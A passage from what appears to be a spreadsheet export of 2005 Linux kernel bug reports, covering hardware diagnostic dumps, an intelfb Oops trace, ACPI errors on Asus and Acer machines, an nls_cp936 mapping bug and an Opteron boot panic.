9: 0 IO-APIC-level acpi 14: 21 IO-APIC-edge ide0 16: 375024 IO-APIC-level eth0 19: 35 IO-APIC-level libata 20: 0 IO-APIC-level ehci_hcd:usb1, uhci_hcd:usb2 21: 0 IO-APIC-level uhci_hcd:usb3 22: 0 IO-APIC-level uhci_hcd:usb4 23: 0 IO-APIC-level uhci_hcd:usb5 NMI: 0 LOC: 78843 ERR: 0 MIS: 0 /proc/iomem: 00000000-000987ff : System RAM 00098800-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000c7fff : Video ROM 000cb000-000cbfff : Adapter ROM 000cc000-000d11ff : Adapter ROM 000f0000-000fffff : System ROM 00100000-3f6dffff : System RAM 00100000-00217be0 : Kernel code 00217be1-0026fdd3 : Kernel data 3f6e0000-3f6ecfff : ACPI Tables 3f6ed000-3f6fffff : ACPI Non-volatile Storage 3f700000-3fffffff : reserved e0000000-efffffff : 0000:00:02.0 f0000000-f0003fff : 0000:00:1b.0 f0004000-f00043ff : 0000:00:1d.7 f0004000-f00043ff : ehci_hcd f0004400-f00047ff : 0000:00:1f.2 f0004400-f00047ff : ahci f0040000-f007ffff : 0000:00:02.0 f0080000-f00fffff : 0000:00:02.0 f0100000-f01fffff : PCI Bus #05 f0100000-f010ffff : 0000:05:00.0 f0100000-f010ffff : tg3 fec00000-fecfffff : reserved fee00000-feefffff : reserved ffb80000-ffffffff : reserved Module Size Used by Not tainted ahci 5988 2 - Live 0xf885a000 ata_piix 3716 0 - Live 0xf8802000 libata 30796 2 ahci,ata_piix, Live 0xf88a5000 sr_mod 9412 0 - Live 0xf887b000 sd_mod 8240 2 - Live 0xf88a1000 usb_storage 18980 0 - Live 0xf88ae000 scsi_mod 47720 5 ahci,libata,sr_mod,sd_mod,usb_storage, Live 0xf884d000 ide_floppy 10400 0 - Live 0xf8844000 ide_cd 27908 0 - Live 0xf8899000 cdrom 27264 2 sr_mod,ide_cd, Live 0xf8891000 ide_disk 8800 0 - Live 0xf8849000 floppy 40676 0 - Live 0xf8870000 tg3 72772 0 - Live 0xf885d000 crc32 2912 0 - Live 0xf8842000 mii 2528 0 - Live 0xf8840000 uhci_hcd 20976 0 - Live 0xf8812000 ohci_hcd 12036 0 - Live 0xf8828000 ehci_hcd 20520 0 - Live 0xf8821000 usbmouse 2272 0 - Live 0xf880e000 usbkbd 3552 0 - Live 0xf8805000 usbhid 26272 0 - Live 0xf8819000 usbcore 70692 8 usb_storage,uhci_hcd,ohci_hcd,ehci_hcd,usbmouse,usbkbd,usbhid, Live 0xf882d000 lspci -vv: 0000:00:00.0 0600: 8086:2770 (rev 02) Subsystem: 1734:1084 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [e0] #09 [5109] 0000:00:02.0 0300: 8086:2772 (rev 02) Subsystem: 1734:1084 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 11 Region 0: Memory at f0080000 (32-bit, non-prefetchable) [size=512K] Region 1: I/O ports at 2000 [size=8] Region 2: Memory at e0000000 (32-bit, prefetchable) [size=256M] Region 3: Memory at f0040000 (32-bit, non-prefetchable) [size=256K] Capabilities: [90] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- Address: 00000000 Data: 0000 Capabilities: [d0] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1b.0 0403: 8086:27d8 (rev 01) Subsystem: 1734:1083 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 9 Region 0: Memory at f0000000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [60] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [70] #10 [0091] 0000:00:1c.0 0604: 8086:27d0 (rev 01) Control: I/O- Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 0x08 (32 bytes) Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] #10 [0141] Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- Address: 00000000 Data: 0000 Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1c.1 0604: 8086:27d2 (rev 01) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 0x08 (32 bytes) Bus: primary=00, secondary=05, subordinate=05, sec-latency=0 Memory behind bridge: f0100000-f01fffff BridgeCtl: Parity- SERR+ NoISA+ VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] #10 [0141] Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- Address: 00000000 Data: 0000 Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1c.2 0604: 8086:27d4 (rev 01) Control: I/O- Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 0x08 (32 bytes) Bus: primary=00, secondary=07, subordinate=07, sec-latency=0 BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] #10 [0141] Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- Address: 00000000 Data: 0000 Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1c.3 0604: 8086:27d6 (rev 01) Control: I/O- Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 0x08 (32 bytes) Bus: primary=00, secondary=09, subordinate=09, sec-latency=0 BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] #10 [0141] Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- Address: 00000000 Data: 0000 Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1d.0 0c03: 8086:27c8 (rev 01) Subsystem: 1734:1085 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 20 Region 4: I/O ports at 2400 [size=32] 0000:00:1d.1 0c03: 8086:27c9 (rev 01) Subsystem: 1734:1085 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 21 Region 4: I/O ports at 2800 [size=32] 0000:00:1d.2 0c03: 8086:27ca (rev 01) Subsystem: 1734:1085 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 22 Region 4: I/O ports at 2c00 [size=32] 0000:00:1d.3 0c03: 8086:27cb (rev 01) Subsystem: 1734:1085 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 23 Region 4: I/O ports at 3000 [size=32] 0000:00:1d.7 0c03: 8086:27cc (rev 01) (prog-if 20) Subsystem: 1734:1085 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 20 Region 0: Memory at f0004000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1e.0 0604: 8086:244e (rev e1) (prog-if 01) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=0b, subordinate=0b, sec-latency=0 BridgeCtl: Parity- SERR+ NoISA+ VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [50] #0d [0000] 0000:00:1f.0 0601: 8086:27b8 (rev 01) Subsystem: 1734:1085 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [e0] #09 [100c] 0000:00:1f.1 0101: 8086:27df (rev 01) (prog-if 8a [Master SecP PriP]) Subsystem: 1734:1085 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 18 Region 0: I/O ports at &lt;unassigned&gt; Region 1: I/O ports at &lt;unassigned&gt; Region 2: I/O ports at &lt;unassigned&gt; Region 3: I/O ports at &lt;unassigned&gt; Region 4: I/O ports at 3820 [size=16] 0000:00:1f.2 0104: 8086:27c3 (rev 01) Subsystem: 1734:1085 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 19 Region 0: I/O ports at 3840 [size=8] Region 1: I/O ports at 3834 [size=4] Region 2: I/O ports at 3838 [size=8] Region 3: I/O ports at 3830 [size=4] Region 4: I/O ports at 3800 [size=32] Region 5: Memory at f0004400 (32-bit, non-prefetchable) [size=1K] Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- Address: 00000000 Data: 0000 Capabilities: [70] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [a8] #12 [0010] 0000:00:1f.3 0c05: 8086:27da (rev 01) Subsystem: 1734:1085 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 9 Region 4: I/O ports at 3400 [size=32] 0000:05:00.0 0200: 14e4:1677 (rev 01) Subsystem: 1734:1096 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 16 Region 0: Memory at f0100000 (64-bit, non-prefetchable) [size=64K] Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data Capabilities: [58] Message Signalled Interrupts: 64bit+ Queue=0/3 Enable- Address: 6600080004090000 Data: 0013 Capabilities: [d0] #10 [0001] /proc/partitions: major minor #blocks name 8 0 117220824 sda 8 1 15719571 sda1 8 2 1 sda2 8 5 101496087 sda5 8 16 117220824 sdb 8 17 15719571 sdb1 8 18 1 sdb2 8 21 101496087 sdb5 254 0 117218304 sdp 254 1 15719571 sdp1 254 5 101496087 sdp5 ps: PID Uid VmSize Stat Command 1 root 544 S init 2 root SWN [ksoftirqd/0] 3 root SW&lt; [events/0] 4 root SW&lt; [khelper] 5 root SW&lt; [kthread] 7 root SW&lt; [kblockd/0] 8 root SW&lt; [kacpid] 126 root SW [pdflush] 127 root SW [pdflush] 129 root SW&lt; [aio/0] 128 root SW [kswapd0] 200 root SW&lt; [kseriod] 251 root 432 S syslogd 253 root 428 S klogd -c 1 261 root 1180 S /bin/bash /opt/sbin/run 262 root 1440 R /bin/bash -login 265 root 1400 S /bin/bash -login 266 root 1404 S /bin/bash -login 267 root 1404 S /bin/bash -login 268 root 1396 S /bin/bash -login 310 root SW&lt; [khubd] 437 root 156 S udhcpc -s /etc/udhcpc/default.script -i eth0 441 root 880 S linuxvnc 1 520 root SW&lt; [ata/0] 535 root SW&lt; [scsi_eh_0] 536 root SW&lt; [scsi_eh_1] 537 root SW&lt; [scsi_eh_2] 538 root SW&lt; [scsi_eh_3] 541 root 424 S dropbear 715 root 1328 S /bin/sh /opt/sbin/swfill 737 root 1008 S smbmount //172.16.1.115/runin /mnt -o username Admini 739 root SW [smbiod] 794 root SW&lt; [kcopyd] 799 root 752 S /bin/sh /opt/sbin/swfill 802 root 1620 D partimage restore -f3 -b -g1 /dev/sdp1 /mnt/images/a5 803 root 1620 S partimage restore -f3 -b -g1 /dev/sdp1 /mnt/images/a5 804 root 1620 S partimage restore -f3 -b -g1 /dev/sdp1 /mnt/images/a5 980 root 348 S sleep 1 981 root 612 R ps Linux Client 2.6.15-rc5 #1 Mon Dec 12 10:02:35 CET 2005 i686 unknown</t>
  </si>
  <si>
    <t>Software P-state coordination and ACPI 3.0 _PSD method in Linux kernel</t>
  </si>
  <si>
    <t>2005-12-13 10:01 UTC</t>
  </si>
  <si>
    <t>2006-06-30 16:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: Linux kernel should have support for software coordination of P-states and support for _PSD ACPI 3.0 method. The original patch for this was sent on the mailing list here: http://sourceforge.net/mailarchive/forum.php? forum_id=6102&amp;max_rows=100&amp;style=threaded&amp;viewmonth=200509&amp;viewday=13 This patch will support software coordination of P-states across logical CPUs in cases where CPUs share a P-state and BIOS supports the _PSD method and lets OS know of this P-states getting shared across CPUs.</t>
  </si>
  <si>
    <t>nls_cp936 doesn't handle characters in the 00 plane of U16(e.g U+00B7, U+00A8..) correctly</t>
  </si>
  <si>
    <t>2005-12-13 17:41 UTC</t>
  </si>
  <si>
    <t>Jun Chen</t>
  </si>
  <si>
    <t>2007-07-06 19:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Not sure if it's correct before. I checked 2.6.11, the same problem. Distribution: FC4, but I use standard kernel. Problem Description: Twenty characters in cp936 are not correctly handled. They're all in the U00 plane. nls_cp936 converts all U00XY to XY but this is not correct for some characters.(e.g. U00B7 -&gt; A1A4, U00A8 -&gt; A1A7)</t>
  </si>
  <si>
    <t>boot failure w/o pci=noacpi - PCI Int Link AE_NOT_FOUND - Asus K8N-DL</t>
  </si>
  <si>
    <t>2.6.15rc5</t>
  </si>
  <si>
    <t>2005-12-14 03:31 UTC</t>
  </si>
  <si>
    <t>2006-02-03 03:58 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none known Distribution: SUSE 10.0 Hardware Environment: Asus K8N-DL (dual Opteron PCI-E board), x86-64 Software Environment: Problem Description: This is a continuation of bug #5135 which resolved the first problem this board was running into. But it still needs pci=noacpi, otherwise no interrupts work. The machine unfortunately has no working serial port, so all I can offer is a (bad) screen shot and a DSDT. I think what happens is that the _PRT/_CRS is evaluated to set up the PCI busses on PCI0 and that fails because two objects (\_SB_.PCI0.APC0 and LNK0) are not resolvable. This causes then nearly all PCI interrupts links to end up as "disabled" and breaks everything. When looking at the DSDT these two objects (APC0 and LNK0) are inside the PIC namespace, which only gets ever returned when the _PIC method passed in 0. But of course the board runs in APIC mode so they are never referenced by the methods. But they're still in a single big _CRS and the AML interpreter just aborts instead of ignoring them. I suppose Asus never tested the board in PIC mode and some other ACPI implementation ignores the unused bad references in the _CRS instead of aborting it. I tried to hack around it by ignoring the lookup failure in psparse.c, but that causes the code later that looks at the _CRS to crash because some state is messed up. Somehow the interpreter needs to be taught to evaluate the _CRS lazily. Hope the analysis did make sense. Steps to reproduce: Boot it.</t>
  </si>
  <si>
    <t>Kernel Oops when use fbset modify frame buffer device settings with intelfb driver</t>
  </si>
  <si>
    <t>linux-2.6.15-rc5</t>
  </si>
  <si>
    <t>2005-12-15 00:02 UTC</t>
  </si>
  <si>
    <t>janis huang</t>
  </si>
  <si>
    <t>2005-12-18 23:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 CPU 2.00GHz stepping : 9 cpu MHz : 2020.282 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe cid xtpr bogomips : 4046.82 # lspci 0000:00:00.0 Host bridge: Intel Corp. 82845G/GL[Brookdale-G]/GE/PE DRAM Controller/Host-Hub Interface (rev 03) 0000:00:02.0 VGA compatible controller: Intel Corp. 82845G/GL[Brookdale-G]/GE Chipset Integrated Graphics Device (rev 03) 0000:00:1d.0 USB Controller: Intel Corp. 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 02) 0000:00:1d.1 USB Controller: Intel Corp. 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 (rev 02) 0000:00:1d.2 USB Controller: Intel Corp. 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 (rev 02) 0000:00:1d.7 USB Controller: Intel Corp. 82801DB/DBM (ICH4/ICH4-M) USB 2.0 EHCI Controller (rev 02) 0000:00:1e.0 PCI bridge: Intel Corp. 82801BA/CA/DB/EB/ER Hub interface to PCI Bridge (rev 82) 0000:00:1f.0 ISA bridge: Intel Corp. 82801DB/DBL (ICH4/ICH4-L) LPC Bridge (rev 02) 0000:00:1f.1 IDE interface: Intel Corp. 82801DB/DBL (ICH4/ICH4-L) UltraATA-100 IDE Controller (rev 02) 0000:00:1f.3 SMBus: Intel Corp. 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) SMBus Controller (rev 02) 0000:00:1f.5 Multimedia audio controller: Intel Corp. 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller (rev 02) 0000:01:05.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL- 8139/8139C/8139C+ (rev 10) Software Environment: # uname -a Linux linux 2.6.15-rc5 #17 SMP PREEMPT Thu Dec 15 15:15:31 CST 2005 i686 i686 i386 GNU/Linux Problem Description: Steps to reproduce: 1. configure the kernel with following framebuffer options turn on: &lt;*&gt; Support for frame buffer devices &lt;*&gt; Intel 830M/845G/852GM/855GM/865G support (EXPERIMENTAL) Console display driver support ---&gt; [*] Video mode selection support &lt;*&gt; Framebuffer Console support 2. add following configure item to grub menu.lst file: title testkernel root (hd0,8) kernel (hd0,8)/boot/vmlinuz video=intelfb:1024x768-32@75 3. boot the kernel 4. under tty1, invoke fbset to modify frame buffer device settings # fbset 800x600-75 5. Press Alt+F2 to change to tty2 console, then press Alt+F1 to go back, the console and keyboard both will die, a kernel Oops occur and this is the kernel message: Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: c03a25b2 *pde = 00000000 Oops: 0000 [#1] PREEMPT SMP Modules linked in: CPU: 0 EIP: 0060:[&lt;c03a25b2&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.15-rc5-gcov) EIP is at intelfb_get_fix+0x35/0x9f eax: 00000000 ebx: df4fb0a8 ecx: 00000000 edx: df4fb23c esi: 00000000 edi: df4fb0a8 ebp: df4fb23c esp: df787cbc ds: 007b es: 007b ss: 0068 Process events/0 (pid: 4, threadinfo=df786000 task=c1524a30) Stack: dd711824 df4fb23c df4fb008 dd711958 c03a23d9 df4fb0a8 df4fb000 df4fb008 dd711000 df4fb008 c03a2d49 df4fb23c df4fb008 00000000 00000000 df787e44 df4fb008 df787e45 df4fb000 c030217b df4fb000 df787e44 000000a0 00002700 Call Trace: [&lt;c03a23d9&gt;] update_dinfo+0x6b/0x20f [&lt;c03a2d49&gt;] intelfb_set_par+0x145/0x30c [&lt;c030217b&gt;] fb_set_var+0x34e/0x3cf [&lt;c0169297&gt;] __do_IRQ+0x145/0x1d0 [&lt;c03a340a&gt;] intelfb_imageblit+0x106/0x14b [&lt;c030109e&gt;] soft_cursor+0x21e/0x2b4 [&lt;c02f5def&gt;] display_to_var+0x2a/0xbf [&lt;c02fb246&gt;] fbcon_switch+0x1cc/0xd3f [&lt;c0379887&gt;] redraw_screen+0x1d2/0x3d1 [&lt;c03712e6&gt;] complete_change_console+0x3c/0x1bf [&lt;c037e169&gt;] console_callback+0x1b0/0x1da [&lt;c037dfb9&gt;] console_callback+0x0/0x1da [&lt;c014b898&gt;] worker_thread+0x2c5/0x3c9 [&lt;c0127b1a&gt;] default_wake_function+0x0/0x23 [&lt;c0127b1a&gt;] default_wake_function+0x0/0x23 [&lt;c014b5d3&gt;] worker_thread+0x0/0x3c9 [&lt;c0153200&gt;] kthread+0x12e/0x190 [&lt;c01530d2&gt;] kthread+0x0/0x190 [&lt;c0101dc1&gt;] kernel_thread_helper+0x5/0xb Code: 8c c0 01 8b 44 24 18 8b 5c 24 14 83 15 8c ea 8c c0 00 8b 90 34 02 00 00 31 c0 b9 11 00 00 00 89 df f3 ab 8b b2 28 0a 00 00 89 df &lt;ac&gt; aa 84 c0 75 fa 8b 82 8c 09 00 00 89 43 10 8b 82 98 09 00 00</t>
  </si>
  <si>
    <t>Renato S. Yamane</t>
  </si>
  <si>
    <t>2005-12-16 00:49 UTC</t>
  </si>
  <si>
    <t>4195 4876 5502</t>
  </si>
  <si>
    <t>There are several brands of Lapotp have dedicated acpi device objects. For example: ASUS: _HID "ATK0100" Panasonic: _HID "MAT0019" Sony: _HID "SNY5001" Fujitsu Lifebook: "Fuj02B1" And most of them have dedicated AML method for hot-keys. So, the existing hotkey.c in 2.6.14 need to be expand to support them in a generic way.</t>
  </si>
  <si>
    <t>Error: Method execution failed [\_SB_.BAT1._BST] - Acer Aspire 5002WLMi</t>
  </si>
  <si>
    <t>2005-12-16 02:00 UTC</t>
  </si>
  <si>
    <t>2007-03-07 23:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: x Distribution: Slamd64 10.2 Hardware Environment: Acer Aspire 5002WLMi (Turion64 ML-30, with SiS NB) Software Environment: Slamd64 10.2 Problem Description: psargs-0339: *** Error: Looking up [Z007] in namespace, AE_NOT_FOUND search_node ffff81000163aef0 start_node ffff81000163aef0 return_node 0000000000000000 dswexec-0460 [232] ds_exec_end_op : [Index]: Could not resolve operands, AE_NOT_FOUND psparse-0508: *** Error: Method execution failed [\_SB_.BAT1._BST] (Node ffff81000163aaf0), AE_NOT_FOUND acpi_battery-0205 [223] battery_get_status : Error evaluating _BST Steps to reproduce: Occurs everytime :/</t>
  </si>
  <si>
    <t>PANIC: early exception rip 10 error ffffffff805e1e9d cr2 0 on boot with (multi) dual core Opteron</t>
  </si>
  <si>
    <t>2.6.15-rc6</t>
  </si>
  <si>
    <t>2005-12-19 03:02 UTC</t>
  </si>
  <si>
    <t>2005-12-20 11:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14 Distribution: RHEL AS4/U2 Hardware Environment: 8CPU Dual Core Opteron; http://www.iwill.net/product_2.asp?p_id=90&amp;sp=Y Software Environment: RHEL AS4/U2, but a vanilla 2.6.15-rc6 kernel from kernel.org Problem Description: Captured via serial with earlyprintk: Bootdata ok (command line is ro root=LABEL=/ selinux=0 earlyprintk=ttyS0,57600 console=tty0) Linux version 2.6.15-rc6 (root@f02) (gcc version 3.4.4 20050721 (Red Hat 3.4.4-2)) #2 SMP Mon Dec 19 10:44:53 GMT 2005 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) BIOS-e820: 000000000009fc00 - 00000000000c0000 (reserved) BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 00000000bfff0000 (usable) BIOS-e820: 00000000bfff0000 - 00000000bffff000 (ACPI data) BIOS-e820: 00000000bffff000 - 00000000c0000000 (ACPI NVS) BIOS-e820: 00000000fec00000 - 00000000fec01000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) BIOS-e820: 00000000ff780000 - 0000000100000000 (reserved) BIOS-e820: 0000000100000000 - 0000000840000000 (usable) kernel direct mapping tables upto ffff810840000000 @ 8000-2a000 SRAT: PXM 0 -&gt; APIC 16 -&gt; Node 0 SRAT: PXM 0 -&gt; APIC 17 -&gt; Node 0 SRAT: PXM 1 -&gt; APIC 18 -&gt; Node 1 SRAT: PXM 1 -&gt; APIC 19 -&gt; Node 1 SRAT: PXM 2 -&gt; APIC 20 -&gt; Node 2 SRAT: PXM 2 -&gt; APIC 21 -&gt; Node 2 SRAT: PXM 3 -&gt; APIC 22 -&gt; Node 3 SRAT: PXM 3 -&gt; APIC 23 -&gt; Node 3 SRAT: PXM 4 -&gt; APIC 24 -&gt; Node 4 SRAT: PXM 4 -&gt; APIC 25 -&gt; Node 4 SRAT: PXM 5 -&gt; APIC 26 -&gt; Node 5 SRAT: PXM 5 -&gt; APIC 27 -&gt; Node 5 SRAT: PXM 6 -&gt; APIC 28 -&gt; Node 6 SRAT: PXM 6 -&gt; APIC 29 -&gt; Node 6 SRAT: PXM 7 -&gt; APIC 30 -&gt; Node 7 SRAT: PXM 7 -&gt; APIC 31 -&gt; Node 7 SRAT: Node 0 PXM 0 0-0 SRAT: Node 1 PXM 1 0-0 SRAT: Node 2 PXM 2 0-0 SRAT: Node 3 PXM 3 0-0 SRAT: Node 4 PXM 4 0-0 SRAT: Node 5 PXM 5 0-0 SRAT: Node 6 PXM 6 0-0 SRAT: Node 7 PXM 7 0-0 SRAT: Node 0 PXM 0 0-9fc00 Bootmem 